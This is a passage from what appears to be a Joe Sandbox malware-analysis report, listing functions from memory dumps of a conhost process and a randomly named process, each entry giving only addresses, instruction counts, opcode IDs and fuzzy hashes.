                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5\_H
                                • API String ID: 0-3325266018
                                • Opcode ID: 78735a4b9015be14a359b7f0d2ae6f1f99ed70ef193e61ca7d545c3ba4eb741e
                                • Instruction ID: fd8b762e826b9e1e342b13c26e4d11b1941517565821f085006f479847f3cb00
                                • Opcode Fuzzy Hash: 78735a4b9015be14a359b7f0d2ae6f1f99ed70ef193e61ca7d545c3ba4eb741e
                                • Instruction Fuzzy Hash: 0F9120B1D1CA899FE789EF6888697A9BFE0FF56350F0400BAD049D72D6DB782404C720
                                Function 00007FF848E50940 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID: cO_H
                                • API String ID: 0-909493557
                                • Opcode ID: 6e38b298c5ee1f8c36f6d0821c3910340b1e9a9714f98ea80f2b7f44069a9a0f
                                • Instruction ID: 2a0dbd578e1e976917f260bdaf1ba4da8ce37414d93e2e2a9a50f74bd5024b39
                                • Opcode Fuzzy Hash: 6e38b298c5ee1f8c36f6d0821c3910340b1e9a9714f98ea80f2b7f44069a9a0f
                                • Instruction Fuzzy Hash: 2B51F471A0CB044FE748EA5CA856675B7E1FB99760F14057EE08EC3296DF34AC4287C6
                                Function 00007FF848E50908 Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: db1e12f441dadcdb6e5a2a53a4c3e2009bcc184a29547c8afaad61bd48053a2b
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: DD21EA3170CD194FD768EA5CE889DB973D1FF9932170501BAE58EC7126EA21EC8287C5
                                Function 00007FF848E50998 Relevance: .1, Instructions: 92COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 15c6646be81774e281b66618215dc3c4b411487ae92fe3def241babcf6bfd30a
                                • Instruction ID: bb703390e30eb0b4cc7a1d99cc15df1ef7a9a91e4cd7ac27b5905d63ec31bb2a
                                • Opcode Fuzzy Hash: 15c6646be81774e281b66618215dc3c4b411487ae92fe3def241babcf6bfd30a
                                • Instruction Fuzzy Hash: 33210420B1CD195FE788B66C545A779B2C2FB99355F1400BAE40EC32DBDF28AC418694
                                Function 00007FF848E5116D Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9c6cac3f8c45a64afe919e66e4b9d726ffdf5a4a65d7c14ad357dc54be2e3963
                                • Instruction ID: 34f2fd6948fca409914ab6d78bd809f5bf0d613bced775e7bdb13b79436fe17d
                                • Opcode Fuzzy Hash: 9c6cac3f8c45a64afe919e66e4b9d726ffdf5a4a65d7c14ad357dc54be2e3963
                                • Instruction Fuzzy Hash: 7B31827190C54A8FEB45FB68C854AF9BBF0FF26350F0505BAD009D7292DB39A941CB50
                                Function 00007FF848E50C25 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f5796da5cd3975a5dbae67b88e84963c5b2d14573592ea2d45c1a7673a7e9b0
                                • Instruction ID: a84696708e7e8b5cda5ec5bc44dc6b8333b90a539d76b70a8280888ee99421f1
                                • Opcode Fuzzy Hash: 7f5796da5cd3975a5dbae67b88e84963c5b2d14573592ea2d45c1a7673a7e9b0
                                • Instruction Fuzzy Hash: 3F2107B6D0C649AFF716BBB898510EC7B60FF42360F1841B3E048DB183DA38254A8799
                                Function 00007FF848E508F8 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: 9e1d92b7ea17909ff94cf9be150208c13e34284f6582faa0980c601a1c4c01af
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 6E01FC71F0D91D0FD568E45D954A935F7C6E7C6670B151279E84FC3245DE20AC5342C4
                                Function 00007FF848E56AC4 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d5f0bcd2f125d4fc4de9257ea26a4a9f04c1e795f85b1caa1d801009ce89bbbe
                                • Instruction ID: 76c0e6252f47db4099085d85f5edd7b8ff329f8c3c1912486bfa26ac5b7193fd
                                • Opcode Fuzzy Hash: d5f0bcd2f125d4fc4de9257ea26a4a9f04c1e795f85b1caa1d801009ce89bbbe
                                • Instruction Fuzzy Hash: F621FC70D0852DCFDBA8EB04C495BAAB3B1FB58355F1041B9C00EA72A5CB75ADC0CB45
                                Function 00007FF848E50C38 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f2c2bae66b53f598dc92e6b467dcd5dadde525fd3e16a4265094a806de8face9
                                • Instruction ID: 347124d804480e39e1dd3eba45831eb7e75aa0c329aecea0573c7405d8eb333f
                                • Opcode Fuzzy Hash: f2c2bae66b53f598dc92e6b467dcd5dadde525fd3e16a4265094a806de8face9
                                • Instruction Fuzzy Hash: BE11A0B1E0C689AFE706FFB888651A8BBB0FF42250F1545B6E044DB192EA3416498794
                                Function 00007FF848E50C40 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 975bf2cb4784d2dd4b30aef1f97b5b9e0894064acc40d8685a71e06e478df7ee
                                • Instruction ID: ef07fed3d19e08da34b1eebd9120c23a4d7cab73e61ec3cb667ddeb304595d83
                                • Opcode Fuzzy Hash: 975bf2cb4784d2dd4b30aef1f97b5b9e0894064acc40d8685a71e06e478df7ee
                                • Instruction Fuzzy Hash: C511E171D0C6899FE706FFB888500A8BFB0FF42350F1541B2E044DB192DA3416498784
                                Function 00007FF848E50C48 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cd84ace66c93516e2ff32e0ac9e110494af291e78f80fdbcb04341d3c9895aa
                                • Instruction ID: ee6aa2306b5b593168268b9397400b6933b772295e04adfb66dc515da0a72698
                                • Opcode Fuzzy Hash: 9cd84ace66c93516e2ff32e0ac9e110494af291e78f80fdbcb04341d3c9895aa
                                • Instruction Fuzzy Hash: DC018C71D0D6899FE706FFB888541A8BFB0FF42340F1541E6E044DB296EA386A49CB85
                                Function 00007FF848E50C50 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be7834a4062989e3dfab369604c39d6f237992473e45b50aba6471ff9f7f81da
                                • Instruction ID: ba2b4253312f481597753603ccee4a05eed4e85fbbc48104a6995f151614dadd
                                • Opcode Fuzzy Hash: be7834a4062989e3dfab369604c39d6f237992473e45b50aba6471ff9f7f81da
                                • Instruction Fuzzy Hash: 01017CB0D0D689AFE706FFB488941ACBFB0FF02340F1441E6E044CB296EA385A48C785
                                Function 00007FF848E5526D Relevance: .0, Instructions: 22COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 89e9858bd42c7874cd54f4bcd00942acccc93cd787e9214600eac03e6a25aa4e
                                • Opcode Fuzzy Hash: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction Fuzzy Hash: F8E01AB0E0D0068FF760FAD8C0003BEA2A5AF84384F150179E92DE72C6CF3AAC418648
                                Function 00007FF848E50B95 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction ID: 1b140a6f5cdeb583bc1deaa5beeaef976f82a692a535772cd175f04ef87adc26
                                • Opcode Fuzzy Hash: c9a7ebac4dbcc1b492641d0918653c0b04b6c1be29c3e3837045c21b23b8b416
                                • Instruction Fuzzy Hash: 91D0A73161D54A4FE745B778D849854BB90FB1F310BC920E1D00CC7261D61448558701
                                Function 00007FF848E50D30 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction ID: 1f1d33734b0e27c711c3f21474e5e8bbd6b9bd376c00b907a4a7f54cd19e6ae9
                                • Opcode Fuzzy Hash: bb4893728b1aa9b66dc85ee20b2448813799ca290fc308348fd43f964418cae0
                                • Instruction Fuzzy Hash: 19E01774A0C20ADFE700FF94C4846AEB7A1FB92361F208665E40187289DB78A684CA84
                                Function 00007FF848E506A5 Relevance: .0, Instructions: 13COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction ID: 34c046652ce2802c3b8fdad2710c0c8617ad701e8c2623648c10ac3629bd7f9e
                                • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                • Instruction Fuzzy Hash: A4C08C81D0E40F09F400B9EE14020ECE2007FC42D0FD00032E50C400C1AEAD20C5014E
                                Function 00007FF848E50B18 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction ID: b7a7bee55d5a81f871b32b8e0110d65aadf32885dc8d5458cf9dae2386804b84
                                • Opcode Fuzzy Hash: b2b767db43ab861b6472bc43987cfc9b405dc4539c5e1ec182c4e5c5dd8ab7c4
                                • Instruction Fuzzy Hash: DBC08C305108088FC940F72CC88481072A0FB0E210BC100E0E00DC7170E22ADCC0C700
                                Function 00007FF848E512D8 Relevance: .0, Instructions: 12COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction ID: 5068bf5995ff6246b36239b7abee49f93e809fc33f5b34d3e07617db06c4d9fa
                                • Opcode Fuzzy Hash: b90639295109e6aec39a991a48599ecd0efb0a15be45a56fce924d123acdad66
                                • Instruction Fuzzy Hash: 32C08C304118088FC908FB28C88480473A0FB09200BC60090E009C7170E229DCC1C740
                                Function 00007FF848E535AD Relevance: .0, Instructions: 10COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 48f4c981493638df4bb3b101e0dc4827dfe4db6e48c6c03725eb87796adc607f
                                • Instruction ID: 063182d1f5798a3d3bdbf9eedc3303054932d2900db5a0e3a893d9694481cd6c
                                • Opcode Fuzzy Hash: 48f4c981493638df4bb3b101e0dc4827dfe4db6e48c6c03725eb87796adc607f
                                • Instruction Fuzzy Hash: BFC08C06E0DC2A9AE2552214042027F0002DF80788F585071E00E872CACF1C190106CA
                                Function 00007FF848E506C8 Relevance: .0, Instructions: 8COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002B.00000002.2440422660.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_43_2_7ff848e50000_conhost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction ID: 3d8a549e766c19a2689fb623471562655cd23d3bedace59be26e18fcedc9024a
                                • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                • Instruction Fuzzy Hash: 1AB01240C5E40F04E40431FA08420E4F0407FC4180FC01070E40C40085AA5D1094024A

                                Executed Functions

                                Function 00007FF848E80D48 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5Y_H
                                • API String ID: 0-3237497481
                                • Opcode ID: c8ffc68d88e618bb9bd493aeab084cdc00293c7105ab1ef8c7895a6088db3a6b
                                • Instruction ID: e295dafea358cf6be0cb41fe3754ce1d14e09928c1b04977fc8d60929d186de5
                                • Opcode Fuzzy Hash: c8ffc68d88e618bb9bd493aeab084cdc00293c7105ab1ef8c7895a6088db3a6b
                                • Instruction Fuzzy Hash: C091DE71D1CA8D8FE78AEB2888693E97FE1FB56350F4401BAC049D73D2EB7918148B15
                                Function 00007FF848E80E43 Relevance: .2, Instructions: 170COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1d95b396a24920f965409c69aebb5e07a84aa49c68554acf22f655b63f0015d5
                                • Instruction ID: a8eb4ac7bccbdd56f3484c3f05bbb5fc44d42a410736aaad1995a5139788867f
                                • Opcode Fuzzy Hash: 1d95b396a24920f965409c69aebb5e07a84aa49c68554acf22f655b63f0015d5
                                • Instruction Fuzzy Hash: 4F51B171D18A9D8EE399EF2888A97F97FE0FB56351F4012BAC009D37D1EB7514118B14
                                Function 00007FF848E80908 Relevance: .1, Instructions: 118COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: f3d52bd67096cabd63d28afac80bb092e1e7fc990ae3d7eedf2212890a1a5b89
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: 1221EA3170CC194FD768EA1CE889DB973D1FF9932170501BAE58EC7125E921EC8287C5
                                Function 00007FF848E80998 Relevance: .1, Instructions: 96COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8e133b0973b8042dd42c2dd12b6fbd54ceb17b184d5dcb038cb6d9ec2718aba8
                                • Instruction ID: ae7b01c5cc58f3f045bb679420249445e3928d864ce28a1faaf30906b1ff6ec3
                                • Opcode Fuzzy Hash: 8e133b0973b8042dd42c2dd12b6fbd54ceb17b184d5dcb038cb6d9ec2718aba8
                                • Instruction Fuzzy Hash: 46210620B1CD595FE788B72C545A7B973D6EF99351F5000BAE80DC33E7DE28AC418684
                                Function 00007FF848E80C25 Relevance: .1, Instructions: 86COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c09cb4d9254496e6c467928670a31dec2b9a882ebfbde9974ccdf6eab5381dd4
                                • Instruction ID: 1214eb40f3f9d7c34931d5dceef699195bce9b176f0469943c994949057e9a37
                                • Opcode Fuzzy Hash: c09cb4d9254496e6c467928670a31dec2b9a882ebfbde9974ccdf6eab5381dd4
                                • Instruction Fuzzy Hash: 8921FC36A0D68DAFE716BB7898110EC7B60FF42361F5442B3D048CB183DB382546CBA5
                                Function 00007FF848E808F8 Relevance: .1, Instructions: 68COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: 41dd62a219195f639a4beb3ab434487037677cb0c4e1bf366816a5d90f271fdf
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 7801FC31F0D91E0FD568F01D944A93973C2E7C6A70B551279D84FC3245DE20AC5342C4
                                Function 00007FF848E86AC4 Relevance: .1, Instructions: 67COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aeb7df8badfb7c1f50effd7860c40e9051219d569192c562bdd998a2f9a3569f
                                • Instruction ID: 28256c20a270e31927ac2db1e567ef4006d620217b6db8054377c11fab812e95
                                • Opcode Fuzzy Hash: aeb7df8badfb7c1f50effd7860c40e9051219d569192c562bdd998a2f9a3569f
                                • Instruction Fuzzy Hash: D221EB30D4892DCFDBA8EB04C495BAAB3B1FB58355F5045F9C00EA32A0CB75ADC08B45
                                Function 00007FF848E86E49 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77b9bf79b815eae3e3245181b7b07f052bc007dd11d9b27fb2e6c6e6286d98e9
                                • Instruction ID: a0c995493ace8c733259586fad4d4ae4e7b32cc65e61771397a5665bd4341af4
                                • Opcode Fuzzy Hash: 77b9bf79b815eae3e3245181b7b07f052bc007dd11d9b27fb2e6c6e6286d98e9
                                • Instruction Fuzzy Hash: A211AC20D1C5098FEB54FB58D84A6BC73E1FF54380F8005B9D84ED32A2EF386D40465A
                                Function 00007FF848E80C38 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 431d7f5eab85f8466126ddcaaa36e898d84c349d4983efa88e4f55e11c4988a9
                                • Instruction ID: f1f3b1c041409ca56abadebc768999c18157d94174677631a6d52a6a530e486d
                                • Opcode Fuzzy Hash: 431d7f5eab85f8466126ddcaaa36e898d84c349d4983efa88e4f55e11c4988a9
                                • Instruction Fuzzy Hash: 2B11AC31A0D68DAFE706FF3888511AC7BA0FF42291F5546F6C044DB292DA38160A8BA5
                                Function 00007FF848E80C40 Relevance: .1, Instructions: 51COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d794f3505dacbd0082ba41b46f9e7a86f90e831a657c8db6b819486aa6100a8d
                                • Instruction ID: d333d624d27f0b71beab26173a52e33469b59126781fca2717f9a70cd697482e
                                • Opcode Fuzzy Hash: d794f3505dacbd0082ba41b46f9e7a86f90e831a657c8db6b819486aa6100a8d
                                • Instruction Fuzzy Hash: AD11AD31A0D6899FE706FF3888500AC7FB0FF42390F5541F6C044DB292DA385A49CBA5
                                Function 00007FF848E80C48 Relevance: .0, Instructions: 45COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 98339198a8b2bccc34b74a92c44dd140db004d9840bafdff8bc85135ef3b94bb
                                • Instruction ID: 5f7ab8b6e2acb53bf22973631f89c7172007dbd8ee51d96236d23a2f36cf58b0
                                • Opcode Fuzzy Hash: 98339198a8b2bccc34b74a92c44dd140db004d9840bafdff8bc85135ef3b94bb
                                • Instruction Fuzzy Hash: ED018C3190D6899FE716FF7488500AC7FB0FF42340F5541E6D044DB292D6385A49CBA1
                                Function 00007FF848E80C50 Relevance: .0, Instructions: 40COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3b15838ac6800a1202e7a301d27b2ee884f0a714087ad8028c0ec014f2706967
                                • Instruction ID: 63498b848950b3a4d723a49f42d8575ea087548fa2e3d3e5974c8a4df7ff9d49
                                • Opcode Fuzzy Hash: 3b15838ac6800a1202e7a301d27b2ee884f0a714087ad8028c0ec014f2706967
                                • Instruction Fuzzy Hash: BC012834D0D789AFE716FB7488541AD7FB0FF02344F5841E6D444DB292DA385A48CB65
                                Function 00007FF848E86EA1 Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000002C.00000002.2475129174.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_44_2_7ff848e80000_NjWYKcLujkVoPzemFBeg.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 27c15ce4a1c331bc52fe54e80a11c8f78838364ee69a8bbe2f5e17b3e25e5991
                                • Instruction ID: 4d462fd4b4e52762c1eaaf2c4e24c7c7da20e0610bf7f1b5a7e045fc417d3dcf
